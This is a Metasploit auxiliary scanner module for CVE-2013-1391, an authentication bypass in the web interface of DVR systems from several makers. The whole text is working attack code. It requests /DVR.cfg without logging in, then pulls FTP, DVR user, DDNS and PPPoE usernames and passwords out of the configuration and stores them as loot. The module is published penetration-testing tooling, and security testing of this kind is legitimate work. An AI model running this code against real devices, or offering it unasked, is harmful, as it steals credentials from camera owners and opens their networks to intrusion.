Multiple DVR Manufacturers Configuration Disclosure

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Multiple DVR Manufacturers Configuration Disclosure',  
'Description' => %q{  
This module takes advantage of an authentication bypass vulnerability at the  
web interface of multiple manufacturers DVR systems, which allows to retrieve the  
device configuration.  
},  
'Author' =>  
[  
'Alejandro Ramos', # Vulnerability Discovery  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2013-1391' ],  
[ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ]  
],  
'License' => MSF_LICENSE  
)  
  
end  
  
def get_pppoe_credentials(conf)  
  
user = ""  
password = ""  
enabled = ""  
  
if conf =~ /PPPOE_EN=(\d)/  
enabled = $1  
end  
  
return if enabled == "0"  
  
if conf =~ /PPPOE_USER=(.*)/  
user = $1  
end  
  
if conf =~ /PPPOE_PASSWORD=(.*)/  
password = $1  
end  
  
if user.empty? or password.empty?  
return  
end  
  
info = "PPPOE credentials for #{rhost}, user: #{user}, password: #{password}"  
  
report_note({  
:host => rhost,  
:data => info,  
:type => "dvr.pppoe.conf",  
:sname => 'pppoe',  
:update => :unique_data  
})  
  
end  
  
  
def get_ddns_credentials(conf)  
hostname = ""  
user = ""  
password = ""  
enabled = ""  
  
if conf =~ /DDNS_EN=(\d)/  
enabled = $1  
end  
  
return if enabled == "0"  
  
if conf =~ /DDNS_HOSTNAME=(.*)/  
hostname = $1  
end  
  
if conf =~ /DDNS_USER=(.*)/  
user = $1  
end  
  
if conf =~ /DDNS_PASSWORD=(.*)/  
password = $1  
end  
  
if hostname.empty?  
return  
end  
  
info = "DDNS credentials for #{hostname}, user: #{user}, password: #{password}"  
  
report_note({  
:host => rhost,  
:data => info,  
:type => "dvr.ddns.conf",  
:sname => 'ddns',  
:update => :unique_data  
})  
  
end  
  
def get_ftp_credentials(conf)  
server = ""  
user = ""  
password = ""  
port = ""  
  
if conf =~ /FTP_SERVER=(.*)/  
server = $1  
end  
  
if conf =~ /FTP_USER=(.*)/  
user = $1  
end  
  
if conf =~ /FTP_PASSWORD=(.*)/  
password = $1  
end  
  
if conf =~ /FTP_PORT=(.*)/  
port = $1  
end  
  
if server.empty?  
return  
end  
  
report_cred(  
ip: server,  
port: port,  
service_name: 'ftp',  
user: user,  
password: password,  
proof: conf.inspect  
)  
end  
  
def report_cred(opts)  
service_data = {  
address: opts[:ip],  
port: opts[:port],  
service_name: opts[:service_name],  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: opts[:user],  
private_data: opts[:password],  
private_type: :password  
}.merge(service_data)  
  
login_data = {  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::UNTRIED,  
proof: opts[:proof]  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def get_dvr_credentials(conf)  
conf.scan(/USER(\d+)_USERNAME/).each { |match|  
user = ""  
password = ""  
active = ""  
  
user_id = match[0]  
  
if conf =~ /USER#{user_id}_LOGIN=(.*)/  
active = $1  
end  
  
if conf =~ /USER#{user_id}_USERNAME=(.*)/  
user = $1  
end  
  
if conf =~ /USER#{user_id}_PASSWORD=(.*)/  
password = $1  
end  
  
if active == "0"  
user_active = false  
else  
user_active = true  
end  
  
report_cred(  
ip: rhost,  
port: rport,  
service_name: 'dvr',  
user: user,  
password: password,  
proof: "user_id: #{user_id}, active: #{active}"  
)  
}  
end  
  
def report_cred(opts)  
service_data = {  
address: opts[:ip],  
port: opts[:port],  
service_name: opts[:service_name],  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: opts[:user],  
private_data: opts[:password],  
private_type: :password  
}.merge(service_data)  
  
login_data = {  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::UNTRIED,  
proof: opts[:proof]  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def run_host(ip)  
  
res = send_request_cgi({  
'uri' => '/DVR.cfg',  
'method' => 'GET'  
})  
  
if not res or res.code != 200 or res.body.empty? or res.body !~ /CAMERA/  
vprint_error("#{rhost}:#{rport} - DVR configuration not found")  
return  
end  
  
p = store_loot("dvr.configuration", "text/plain", rhost, res.body, "DVR.cfg")  
vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{p}")  
  
conf = res.body  
  
get_ftp_credentials(conf)  
get_dvr_credentials(conf)  
get_ddns_credentials(conf)  
get_pppoe_credentials(conf)  
  
dvr_name = ""  
if res.body =~ /DVR_NAME=(.*)/  
dvr_name = $1  
end  
  
report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}")  
print_good("#{rhost}:#{rport} DVR #{dvr_name} found")  
end  
end  
`